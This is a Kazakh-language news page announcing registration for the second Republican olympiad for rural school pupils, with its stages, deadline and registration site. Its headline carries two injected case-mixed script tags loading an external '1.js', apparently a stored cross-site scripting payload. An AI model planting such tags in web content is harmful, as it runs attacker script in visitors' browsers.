Қазақстанда ауыл мектептерінің оқушыларына арналған Республикалық пәндік олимпиада басталады<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.09.2024



👨‍💻4 қыркүйектен бастап ауыл мектептерінің оқушыларына арналған жалпы білім беретін пәндер бойынша екінші Республикалық олимпиадаға тіркелу ашылды. Өтініштерді қабылдау 2024 жылдың 20 қыркүйегіне дейін жалғасады. Олимпиадаға ауыл мектептерінің 9-11(12) сынып оқушылары қатысады.

📊 Олимпиада төрт кезеңнен тұрады:

I кезең (іріктеу) – 2024 жылдың қыркүйегі;
II кезең (аудандық) – 2024 жылдың қазаны;
III кезең (облыстық) – 2024 жылдың қарашасы;
IV кезең (республикалық) – 2024 жылдың желтоқсаны.

⚡️Олимпиаданың өткен жылғы жеңімпаздары пәндер сәйкестігі бойынша биылғы олимпиаданың республикалық кезеңіне барлық кезеңдерге қатысу шартын сақтай отырып, конкурстан тыс қатыса алады.

🔗 Қатысу үшін барлық ниет білдірушілер auyl.daryn.kz сайтында тіркелуі қажет.

📌 Естеріңізге сала кетейік, ауыл мектептерінің оқушыларына арналған жалпы білім беретін пәндер бойынша Республикалық олимпиада алғаш рет өткен оқу жылында ҚР Оқу-ағарту министрлігінің бастамасымен өткізілді. Ол Қазақстанның шалғай елді мекендеріндегі дарынды және талантты балалардың қабілеттерін анықтауға және дамытуға бағытталған. Олимпиаданың бірінші жылының қорытындысы бойынша ауыл оқушыларының жүлделі орындарға ие болу көрсеткіші 8 есеге артты.

Анықтама үшін: Олимпиада барысында ауыл мектептерінің оқушыларына толық қолдау көрсетіліп, олар алдағы зияткерлік жарыстарға дайындалу үшін республикалық «Дарын» мектебіне сырттай қабылданады.

Просмотров: 6344


Пікір қосу



Деректерді қолтаңбаға қосу